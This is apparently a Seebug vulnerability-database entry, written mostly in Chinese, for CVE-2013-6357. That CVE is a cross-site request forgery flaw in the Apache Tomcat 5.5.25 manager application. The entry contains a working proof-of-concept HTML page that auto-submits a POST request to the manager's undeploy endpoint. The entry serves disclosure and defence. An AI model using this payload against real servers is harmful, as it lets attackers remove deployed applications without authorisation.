Lucene search
RootSSV:61112HistoryDec 16, 2013 - 12:00 a.m.
Apache Tomcat 5.5.25跨站请求伪造漏洞
2013-12-1600:00:00
Root
www.seebug.org
78
0.001 Low
EPSS
Percentile
30.4%
CVE ID:CVE-2013-6357
Apache Tomcat是一款开放源码的JSP应用服务器程序。
Apache Tomcat 管理应用程序中存在跨站请求伪造漏洞,攻击者可以通过POST方法操纵应用程序部署。
0
Apache Tomcat 5.5.25
目前厂商暂无提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
Undeploy Applications
<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to Undeploy an Application</H2>
<form method="POST" name="form0" action="http://<tomcat_ip>:<tomcat_tcp/port>/manager/html/undeploy?path=/<name_of_application_to_undeploy>">
</form>
</body>
</html>
Related
veracode
veracode
Cross-site Request Forgery (CSRF)
2019-03-25 08:40:43
prion
prion
Cross site request forgery (csrf)
2013-11-13 15:55:00
cvelist
cvelist
CVE-2013-6357
2022-10-03 16:14:51
cve
cve
CVE-2013-6357
2022-10-03 16:14:51
openvas
openvas
Apache Tomcat <= 5.5.25 CSRF Vulnerability - Linux
2021-03-18 00:00:00
Apache Tomcat <= 5.5.25 CSRF Vulnerability - Windows
2021-03-18 00:00:00
zdt
zdt
Apache Tomcat 5.5.25 CSRF Vulnerabilities
2013-11-04 00:00:00
seebug
seebug
Apache Tomcat 5.5.25 - CSRF Vulnerabilities
2014-07-01 00:00:00
ubuntucve
ubuntucve
CVE-2013-6357
2013-11-13 00:00:00
exploitpack
exploitpack
Apache Tomcat 5.5.25 - Cross-Site Request Forgery
2013-11-04 00:00:00
packetstorm
packetstorm
Apache Tomcat 5.5.25 Cross Site Request Forgery
2013-11-04 00:00:00
nvd
nvd
CVE-2013-6357
2013-11-13 15:55:04
exploitdb
exploitdb
Apache Tomcat 5.5.25 - Cross-Site Request Forgery
2013-11-04 00:00:00
nessus
nessus
RHEL 5 : tomcat5 (Unpatched Vulnerability)
2024-06-03 00:00:00
ibm
ibm